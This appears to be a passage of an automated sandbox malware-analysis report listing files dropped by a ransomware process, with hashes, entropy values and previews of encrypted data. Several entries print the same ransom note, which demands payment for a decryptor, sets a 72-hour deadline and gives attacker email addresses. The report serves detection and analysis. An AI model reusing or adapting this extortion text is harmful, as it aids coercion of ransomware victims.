                                                                                                    Size (bytes):14722
                                                                                                    Entropy (8bit):5.978925654402053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:+nr3c2d91b0lZ6mgtdHOelGdWaolvsTJ/n:gc2dcejJGxwGFn
                                                                                                    MD5:20EA9FB247351FA51ACF24CC78C7DA58
                                                                                                    SHA1:D1A7B2074EE654B5F0135A003125085321B178E2
                                                                                                    SHA-256:940ED9A34BBF1BBF74B3983AA47612D2501A4A57C753F5CC41330B319F64D4FE
                                                                                                    SHA-512:DA4109AC0898377416C1EAD2C773154435BF750C4EE5CE3B22EBF42DBB8666087C0BEF77732E03E072C259EA5E1F95EA9210C635324A65EB66A6CFBBE32331C1
                                                                                                    Malicious:false
                                                                                                    Preview:...lGO~...hT|.....jq..#P..4........2..M9.-f....';....;.h.#r)...E..'.]..m....6.z..l...:./.{..rV.0C.T..|Y.I.._6z....bn.e.R^....0.T.....;.$.. p.s.].:. .........X.i.......nqyX!..........yZ...##dN.....g..M..[...l..b[..7+e-;.X|N..NrLE..._....6...*qi.6Yg......g2.fM.=M....<....lz.=r........mB]@.....^0...FY.N......pY.E.|......T...a......0.g3Y.yfp.>.y.W^hf..........c*.%w....V.w....f.(7. ........bx...:w-......N.2c-7M......\.....k*.B.7!.".~.q..@...#$....U...R40...0.V..aw....#...IXg....v.UQ...Z..!..D)4.0.. D_..~........P.V.%.7%GE...d.x..]U..Q.Q...}El...v.....k.9.h.t.nF.;!G..........P.O....c.2Q...:.U.x....7O..rB&4|i..l..2f...'.1...-...q..uM..w.L..R...q4u/.r...K.z6..8....Mc.^'..J.%......qh.F./I|E...m_1.D.V.Y+..J.Ji..G.n.8.......:.k......I..s......a...qA:mc..........OW.Ox.a....aw...F._.s}l...o`%.G...0.q....CW.@.})..h....d.....&.=.X...Wn...*o]&E..3.U.Q..&un..5....&.'......G.#.9^X...1...."...E3....N.z..+...XJ6....4fgd....l..5!.l=k.=..Z.....d...{.g..9..Q|...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):302
                                                                                                    Entropy (8bit):7.305534075330514
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:JqCWCwcIWWa2WdNEQjmNcfdd0HGo9T5f/ZnibjGBM42MhSn:ACZOWdNdjR0HXTboCM4JSn
                                                                                                    MD5:8F67298ED9552DDB344FA00186F34DB9
                                                                                                    SHA1:A1F51B7AD8F23188DA5467DDEE5A669588340E64
                                                                                                    SHA-256:955C3D86662B488B2A1882E3B28E58B36043FB71BA015E36AD2EC843D8928944
                                                                                                    SHA-512:EC6A1F226316E29638DBA8D7D6254FC91F3D6C386201552846C3886440F6A76D461B0A8FEFAEEBC41FED68B633CF8B3EBBBA0294C0F223EA5C2A21B3A3D08802
                                                                                                    Malicious:false
                                                                                                    Preview:Q_G...r... .B.....\V.fEbb'.-[.....L.S7..9.>....y^..K.cos..g.L.|.#...u.7.s.......uA..D.F.D7.m.......v..G...\W.I#F.^.Y........Nc.Nsxj.(@a(...y.{.L8..._....."4rK.Dn.......-:.8V.............Z....%..QpZ.Fe.<p.@.TVu@...YI...d.5.y1..B.c%...q..c..;.e.*V.....^EY._.......M..E...Pb0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):320
                                                                                                    Entropy (8bit):7.291372198446098
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:SKjqLqPiL2bcbIubLW2S5uHaCON5nGOEEp2bGwn:TjqL055aZON5nGMqGwn
                                                                                                    MD5:7C9AC1E3AA96C6D53BF5BBE254A70807
                                                                                                    SHA1:E68263CB3B0914D9962FFF430DE1071FCE8DEAA2
                                                                                                    SHA-256:83CE556BC08A42726A2C799FFDE1E4CCC307DEB2D83823D819F7CEA3271789FE
                                                                                                    SHA-512:3D64E1FAB7D30764E1EED83204635ABD9BFB942F93C382167FA462A0E3FF8CD4AC8E969B2F17051F9CD2FEE25D464B63D68C59A3C20B7E4E8218744B81823A4A
                                                                                                    Malicious:false
                                                                                                    Preview:b....+.e...ID~......f*z....L....c.v.A.*.ZuSZ~w............\.&lwj.4.jj._....e...;8...I....j.....P.B].`.S$......0. ..m.b=...Xn..3..q[.6...B.>.5..;{xR..9...;P.X.`.7.[2...~..|....(zL...o/..*...O.I.<.y.c^.#.P..Qb......{...7q{hM.:.;.JctM....R:a.$.B..}G...UH).#.........U.g.eL..|.yu.......[G.2t.I30xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1226
                                                                                                    Entropy (8bit):7.813586503416373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gaCE+jM+MYn+t36nSICSHNNUO3nMxIQlJe3az4mH:UE+Y+MMKKnSxyUMADJfP
                                                                                                    MD5:FED38B64B23C606DCAB950724915ACF8
                                                                                                    SHA1:C397C4CE4B9E273CE3537E017070523AA4DD47A8
                                                                                                    SHA-256:623F5E70776F97266BB5711E7A86C0BF61C35DB4DD55DBD930824E67969FB156
                                                                                                    SHA-512:654EE60913BA3351610B1482DD2A932C53EAFE628F73897841FDC3D24519F9E2B3C561B7776FA52F061BA028B5672CD1DFDD8E5DE2404FBB26E5E0A2D6956D3F
                                                                                                    Malicious:false
                                                                                                    Preview:=I.....T2.i.a.........../. ..&..t......-..=..k2.W..O[.$/.L......E.)...q......U.[......;...0./A....n.j>!...?:.....q....L....F./..z.a.Z... ..T(\L.;.@.P7.0.^...{.6...N....e...;i...'dJ.....~y^..g...3B....(2...Q....":.N.\.pb.1..3ywF.c..$.K.g.).N.t.6..'....)....jA...,$S......@...#1.V..L./n.OZ.ZfX.......8......}.....s.mIG.K.o....9l.Xut:...k.n..s.....^.....(Q...@.l..O....n.z6`#....V.:kM..&&..$...|t....=AoZ.A$......sV....].....>*$......A..7.um<Q.. ..9|.o.i...C.F...)..8H...d..C`......;bu..+....u...?Oq<+..wrq....l`....f.nmPUq...9;...#.....s.H.<......:..?BU+zs....{..p...l.x.8W.@,.........M...C.I@..}yd...]..*.....d|.<...9....(...v..../..J.m.q.+.].2...j..3.5..!.o......DmA<.$.e*..7.`..{'.Tql.F..........F.v.p.Ww.....jh.L..A..S.W..L........R5.....s..8n..k....f.....\.....w........&..$....,.M.<e.r.X....79.X.|7......M....X.H..>1"#9.......M..;R..~..l5<?..4.....;.^...)..gF*...0....(Al8.3.*.......f.Z....V........OG.s....~.1..*...2YO2.. r.*..>F$.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.1541502559271075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:O6zjoSfiPNdY7tmFahz6yUBjxFcOCMmVSnVYXVw/7C2y9SOFB6t6Sn:HvoVNcgaJiLCMEhVK7C2yBuQSn
                                                                                                    MD5:B75C815EDD8C0C69B4638897E6045885
                                                                                                    SHA1:654006CBF8265E406C2A9630B1EB9787472D74E7
                                                                                                    SHA-256:82E86B6FD592B08304AB386E5601E7E3D9FCCCD668EF4480DC263ACF4938A3CB
                                                                                                    SHA-512:F52286477C12AA5517FE81E6B3243EF084D50A9A0BE7DFA3816D3D7D10017267DCC5BF4770CEF369A58F95AF756556931C150220A2CFC9E0A117F98E1ACF0DDE
                                                                                                    Malicious:false
                                                                                                    Preview:..?..FJ.....2.............a..Z..3.9.krz....o4[...A6.D~dV...s.?M2...........u#c5k.n.h]^..'..o...#U..q..,'.k..^DQ...P...+v7.l`#q1] s..h...).KA...=..C.o[....QD..@.....V...*.L...3..!..qn..MC.Hi4=X....2/.CTvw..#p..B`U..dE.K.....]...q....y...[...c......{....v...ms..1....s.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.156724941915944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:UC5frj+rzfqB1hpahOE3UrUT36JhA9MHf7Wdmn:UCx+rWB1rrsUUTqJhA2f7Wdmn
                                                                                                    MD5:F552334171A4CCF95BCEF7AE83D6A55A
                                                                                                    SHA1:10EC467574A44206FC8A6A0194BD5C4AC213E422
                                                                                                    SHA-256:ACF72D346A275AFAB6C571BF3177E2B3E1BCC43C88E8E91CB5BE2A99E25AAD7B
                                                                                                    SHA-512:7FFF51CEC83A3B398C4094ED126013D12D02EBE596C1441E8C042B32C9C2061714D54847B566EB34A3FED968B3C7488316AB5ABAFEA99EF61BAE48D9809BC04B
                                                                                                    Malicious:false
                                                                                                    Preview:...=C..8+.@...G....n....:..yt.e^..}.O...kY..a...gs.....V~.5.?.#..W|"N.e:..Be.S[Y..$.S...l..8.).J%..[,{...v....Q_..<{.#g.S'.p..l......- .~.kw....B..X.!...4.....P3+...j.%t......8.2.m.c!..%..x.......m.9...)..~.o...}i.[..iO.VV..e+.,..:....!n...x.....E.M.!A8.{.MV..K......0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):734
                                                                                                    Entropy (8bit):7.708035787857152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Y3a7FTgZ1Bp+l9Nv/Q6VBidxzC3K17jjgPCj2hC+099b7XE1FEXJZd7U47q4YLZV:Ia7FTuBpanDgm3M7jjrCg+2DgENA4+4S
                                                                                                    MD5:A01527E162B7A67E5905BC8A14FDC9ED
                                                                                                    SHA1:A19D94B963BC6FF07D46DAAB9ECA16F7999AC479
                                                                                                    SHA-256:75148324769B6480438E4CBE94812259BAE02E6B6B8A2D03BF779F7629CB2E57
                                                                                                    SHA-512:6B771C72F5F877BE66957833AC39592DA6E2C1F6C8765A56BA7B5DD6F289C2EA90FB6258A0EEA8F267EBEBAC505649B3EAB874A04AFEF9D7AA890C7896C8F7B4
                                                                                                    Malicious:false
                                                                                                    Preview:..*..[..o.\,..B.1.8.....c..s6...U..>..`....|Z.DTA.?]..t.6m.&.&...fP.K58.a....uR.._EX<.....K..w..%%..'5..?X.+.3..d.O...s.(.........7..6..Zr8..t......Q.....e.]Q..k....2vo....@tR...2%.....Gw.j20.....2X...&0..58.e..+t...7BY~x.xp.xM..Yl!N.?A..;....&'I.5.1K..#......G.UAI.RQ..b..F..h..+........Hx....(..n.....o.n.H.$...]!.-.<a.L^b...'.*)y;........)..P2.l....v...-g.g.Y.O{y.....MtIXG. .....n<#N..(`.l..:. ...m}saJ..gK..@@.Tey./..)...b..HF. Q..7...tv...n^A..r..+Y FH...p.HJ#+..2.2....XHPV)...^.X..K0-}..U.0...".)j.....V..5".=.!~....Y.?.....Ojjyf..v...*...r..{.....L.-....hRZ.1......|C......y..."..d'...YY.a..).~l...H..v......56}L....TD.Q=.(.7..4.M...k;.P..4......-..rg..G....L..(..Q....xx.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.2489035623154585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:4bxkbTi5aW07/VuDNJe5EJxxdT94fZcmtlW1CXTwPnFSn:4bx7a7uN/Dxxafmnkn
                                                                                                    MD5:37EC38CC8B37B342405261690A6BD644
                                                                                                    SHA1:44FD61C58242C687A994009980EAA8F951065DDA
                                                                                                    SHA-256:0030EDF5591FBA864486946166B487FE190442A57FFFCF6627926161AF9B7298
                                                                                                    SHA-512:CE50E614D7D92103604D003CD9385E2FDC9F03E0EACDE8B5CBBB9C4E0B24AD0C9439936AC1AFF95513397174E136B11C287BE7283BAADCC30382B723F9146471
                                                                                                    Malicious:false
                                                                                                    Preview:..+..~.~...G.X....C.>....p..F...;q.....nw.+\.c.l.U./....?..[.{~.K.0R..zv.B+..3...A>.....Sg.H...z.Q.G{.......H....Cm.yrs...).1....F4....p...D..r...._$.t.....Og.(.........s..3..+.......CH1.UpF{R.:.m.D].L.....^..y23.2W..l......8".&8s.K,...z..`...`2......I<...*j..8dF...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.155575567826174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kUzAvPDKwz9titv2QTMJ+z73qizMPJF7oJhmZDhdZAbZsSn:kUzcPDadlbz1oPJNo7U4fn
                                                                                                    MD5:480D0E323D9A3CA89C1560A1CD12DA31
                                                                                                    SHA1:6C15AD2C69DEE7495E406FC77071FAB1BCE4FC5B
                                                                                                    SHA-256:D63837114197796F7A1945E72A0DA020F0D22BED290BC97447E882F9C88B7808
                                                                                                    SHA-512:B9DA71AE8DE0CEEF73080906A6E8F3A1388B73BB80DE83BAFB61F49C4679B1E4F5EFE07CEC32F78A80A25614247908978F9ED0BBD12CE082443FAA38CD3076FE
                                                                                                    Malicious:false
                                                                                                    Preview:.Cb.{M.wT*M,&.."............X.....F(.....k.j.....<{.c|$.&4...lR.7....J6P1...39...o...a.n...U.S@M.u..E.l9.j...2.1H[1/..Z.!.&.+..@.f,9.C.)....M.m...}......\.!f..C.".Su...l.rA.d.......?2....1..>.P.U<x6,..1.......".&.K3!-j+..l...BI.......8.gC:.=.. V..%w.&.Q.P..h......(T.R.WM.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1284
                                                                                                    Entropy (8bit):7.8266522239520375
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KJ75LFUcJoAbryP6SgJpu4KRKpx4utJ5lX/D0sY7A2LFm54CJzZq2nam6qoq:KacSAiiLJQpRKT4ub/Db2Rm5xJzZq2nh
                                                                                                    MD5:A8498D3166C70655C5D5D4E2A2BB95D1
                                                                                                    SHA1:14FE6B2B484506F2C90B0A0B913447FC6C6C0653
                                                                                                    SHA-256:75C5CCEEE92026BD7E3893D1C7F222808F137A913756C50B812D031AB2C585EB
                                                                                                    SHA-512:57444DC117E3C3CBEFF9E8939AB4395D560ECB80CCF808FC4605A1FB95182AD1CB57D83833DE009B4F9822E70BF30C549E120D36788E46AFA61626B99264CD6D
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):7.91167585603616
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:u6h65xkAnqDthmLtZN8Bn0exCOhvmvfTL9hKdOqj2NnbWWE0MEkyT:NhOxkAMh8ynnHhv+fHXKd9j2hWSMEk6
                                                                                                    MD5:419C3D8D19A4D27D74CF93BDFE79A036
                                                                                                    SHA1:C0472E5EE9278DB4E75AE6CE8185E22DDA5C4258
                                                                                                    SHA-256:FD4DAD32120F84F6CA9FDE30FD7CB94B106986544AF55E289CA3D91B7CDF8915
                                                                                                    SHA-512:49513A21D97F289581AD9DC1E9D7BB694A3EE09C78630BB1FFE51C3840938DC927ED7CE0A81E5A705483619003425979B020D0D5DB77565F994A40CC15EF7564
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2320
                                                                                                    Entropy (8bit):7.914121180175424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZffUSrEVc3uLEcUZ8b27NMG3crvOmnJTr6sisKaJefbINDWAU:hsSrEVcejUm2sz7np6Pha9N+
                                                                                                    MD5:5EE812E1E0C376F3FE72025721395881
                                                                                                    SHA1:0A6B70BD3B845D2F8A25863F80EED8467EDE8203
                                                                                                    SHA-256:FEDA85155FA967D8E72A6B76160AE1880D95BE7AD0058EF77B453C693602892D
                                                                                                    SHA-512:705ED8B5AF6E8717CE5EFD313CB64B8EF224168632A52B64D8C9D9866CE2B8743C8768630A7839F3C04930EE1B67971DA829C13406E4F0C593090B3BE9EDCF02
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2337
                                                                                                    Entropy (8bit):7.905134440771145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:eUiDQKqVeIGne4UqyYhjNBdw8gyUuCAIpkc6t3inkDwHV0dmycj2ZC:eUiwVbGe4UJ4TwByUb4SnkKVswH
                                                                                                    MD5:1F01A7F884C834D8AE1538D58D16ACB7
                                                                                                    SHA1:5E2600718AC19541711D86F80CDD64215B3FFE6F
                                                                                                    SHA-256:5847D1B75894BCFDA0DB8E8A059AB597C2350F069C81448B30BF7B26D7D72EF1
                                                                                                    SHA-512:9C770E646D159BD35A2BAC6B5D6FF8731CB7D78C08C0D824014803980C158E94044709B330AA6D51B220F210353F1F00B3D8A39BF6CC72733636AB82717716F3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1290
                                                                                                    Entropy (8bit):7.851457976329037
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:295q8+dddO0inAfVrKf+UfrSTTUeGG2vK/KW7H/G8pwVi5GHciEW3NVeHH:2vqlddO0kkrKrOEeSIKW7XSuIdVEH
                                                                                                    MD5:B462007F0A22E250BB84C4DB2E15C1FD
                                                                                                    SHA1:2DA892BC7C47F4EACF76F37A19760D03DFF8771C
                                                                                                    SHA-256:07A5666D969BB9986B96A9C2AE6E7C4390DA149B4B40479F501A951CA4654034
                                                                                                    SHA-512:A7808453E72A7050A5764F6ECA5A7FD4A50EB90B865B84AB116BDA668A4B9114906FC039E8843AC64161A738ED12AA0DD5FCC1296A308F826A3E6AE9AC2923D0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2348
                                                                                                    Entropy (8bit):7.919487531616361
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/OGVb3WGbmp+h9dHKEiZBVtcmzxSAkBQklbnvCpmvk36e7Xyd8NMmeOhgE:WGVS5K9dqn5IvBfCAu6H8NoO7
                                                                                                    MD5:0670A43FA398F2956955BB68505D06AE
                                                                                                    SHA1:38045EE18388C11A49E6E5C4E8916E7BADED7508
                                                                                                    SHA-256:2C4FFF96C396370C49866DF00FF978038B817580C2475BA78C36C6FEA63B2238
                                                                                                    SHA-512:342A31D68289094E0EB30BF02A27BD17317BA0273CD30287D3708E26BADBEB6BB08A4DC463888769E8FEEA9C37FBC7D3B8E1A1DC3D2A02BB5B8B40BA7F0436F8
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1802
                                                                                                    Entropy (8bit):7.8845992812091845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/NjWl1MWxWNtOyVrDq4JR+y82DYSK1pL47/aS:/UrvxWbOb4JMFH7s+S
                                                                                                    MD5:E9BF9FE1419F0540FE191FBE786FC32C
                                                                                                    SHA1:D2D482680E28EF501FCB03E6423FE65E4042D4CA
                                                                                                    SHA-256:D1DD22FBF3A7D4F78D597322B571153F19E9BE340BBF0C1BB1CCDD65B58DB4AD
                                                                                                    SHA-512:9B33BC941F1FD601FFC417C302B6A18FCAF79F52B0660299FC0B051BD31C5EC263D0A351D90636FCEEA96170657634BD747C7723F7DD806DB4ED3FE2427337C4
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5898
                                                                                                    Entropy (8bit):7.443348663077553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RpjoPBMSah7pL+8/D55nKtHWk3jPMnnkIJxl1qUxqluzP5rh4QCGdREzAZiQ1:RGPGF7pL+8/D55nal3jgd1qU0luRh4Q1
                                                                                                    MD5:CBFCBDEBED36665661A7831775A8A580
                                                                                                    SHA1:3C09332FAB701393ED858709A533ACF241F34AF8
                                                                                                    SHA-256:551AF9209B83B3F5BC7849E089FB5AC531AA48FAC6054C31EB1E0AB1E66372CA
                                                                                                    SHA-512:724EE7D40117261207189DE50461F8250C73390315213751B551E82032280CA4240810A6D0C636E97599E9F7286062EDFA71766223047BFFD2267D2EC1328FA2
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.853019760481883
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:WEucGd9dFLUzOM8xGZ19AQCZz8KBffdrF7UjIfDM:WEQdFUp8xSeZz8edr3g
                                                                                                    MD5:AF9994E7BC918BCFE45D10207BE53CEB
                                                                                                    SHA1:CB2683AEA3E61AE417F552169B00C6EBFAC1116A
                                                                                                    SHA-256:8EB1D6CCF436CC3D4F66360A994D282FBB4E6457A4B5CDEAFFE4F0869B8F8A17
                                                                                                    SHA-512:722FA5F64B71F02F20E85C5733554286A19E791A2735C0127A1F2D25CF0CB94D394ECBC36CACADC23E097F8DC01BA367BD185C62F4C4ADE2882627C2DC5005D1
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.872880586220622
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:4ri9hMXZGD/w1JuZTpkTenWeVVWR/lWICWZ20pYwE+VeEhMUWe2ie:42E4c1cZeyWgVWDWL/5IVJ5r2ie
                                                                                                    MD5:090A0D11E7B64AEB0C322E32FD4CB78B
                                                                                                    SHA1:4B500E2A65AAA0B384801E2904D69CA2F73DE5DE
                                                                                                    SHA-256:6057952D73B4631FA4449CBE185A2EA246A1DA2FE9C7488EFC48F0A5D967A4FC
                                                                                                    SHA-512:7177FAC4120620AF099E438CA889DA7D4325775E99A8F2F8C57FB611B6D80BEB6A9F5FF2699459431DE88A46529A788DD52B250E67283A380D284375D199EB55
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.828916303483934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:YzuCVj6ZFCIhBM7fa407nGwomCOd9IVPNUqgQR8XE4izhoxx2Mm3Qmr1iVtBpm:YqLoT6LGttOaFlg3YhOxW3QSibBpm
                                                                                                    MD5:FB6BE3AE4FDA2DCB31073FF0F8ED9E1F
                                                                                                    SHA1:DEA0BE3C8CE7907684AD79291795B486796DE3B6
                                                                                                    SHA-256:0F6A4C3EC7F156DE51AD1A1DB4191D9C7ADB16A701B2D3A18968B0F49CE2B2D4
                                                                                                    SHA-512:8F55E16C34D5A0F261336846EE2907FCCFF9AB7A3787FAA4E3454C40254AD90F4559779B9760335D32EAFB0E3EE7B144C8E0048CCBEEE9D1340752E96B2C52A5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8518088860835675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:N4wcPtjOcSLpDIgU0g4ZV7N7ZT4DJU1F2RwLTzUTklQt+BGS+SUXnB:N4w+tKZLpDI8h1cyOyUTklQlUUXB
                                                                                                    MD5:6CD19EA81FA591720E2A07FA68171197
                                                                                                    SHA1:63E236043AAF85E2048E373EDF7669A70D30709B
